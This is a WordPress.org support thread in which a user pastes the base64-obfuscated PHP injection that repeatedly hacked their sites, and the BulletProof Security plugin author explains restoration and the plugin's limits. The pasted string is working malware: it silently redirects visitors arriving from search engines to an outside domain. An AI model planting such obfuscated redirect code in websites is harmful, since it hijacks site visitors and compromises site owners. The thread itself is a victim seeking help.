WordPress.org

Ready to get started?Download WordPress

Forums

BulletProof Security
[resolved] BPS not working for me :( (2 posts)

  1. Denish
    Member
    Posted 2 years ago #

    my sites usually hacked with

    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGlvcG8uMjV1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

    then i came to know about BPS plugin, which prevent "base64_decode"
    i installed it, and even my .htaccess file got bps codes

    still today, it hacked again..inspite of BPS plugin..

    please help me

    http://wordpress.org/extend/plugins/bulletproof-security/

  2. AITpro
    Member
    Plugin Author

    Posted 2 years ago #

    If your website is already hacked then you will need to restore it from a good backup of before it was hacked or backup all of your files and database and then re-install your site and restore only your content and comments back to your WP database and upload files that you want to keep like image files for example.

    BPS is designed to keep hackers out, but if they have already added their files inside of your website then there is very little BPS can do because the hackers are already passed BPS security protection.

    There are a few things BPS cannot protect against.
    1. Passwords being cracked: FTP, SSH, Control Panel and WordPress Login.
    2. Host Server itself has been hacked – not your individual website, but the Server that your website is on (ARQ Infinity in BPS Pro does offer individual site protection when a Host Server is hacked).
    3. Directory permissions that are set incorrectly – if you have set directory permissions to 777 by mistake then BPS cannot do anything to protect those directories because they are writable to everyone.
    4. And of course if your website was already hacked before installing BPS – hacked websites should be cleaned up or restored before installing BPS

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic

Tags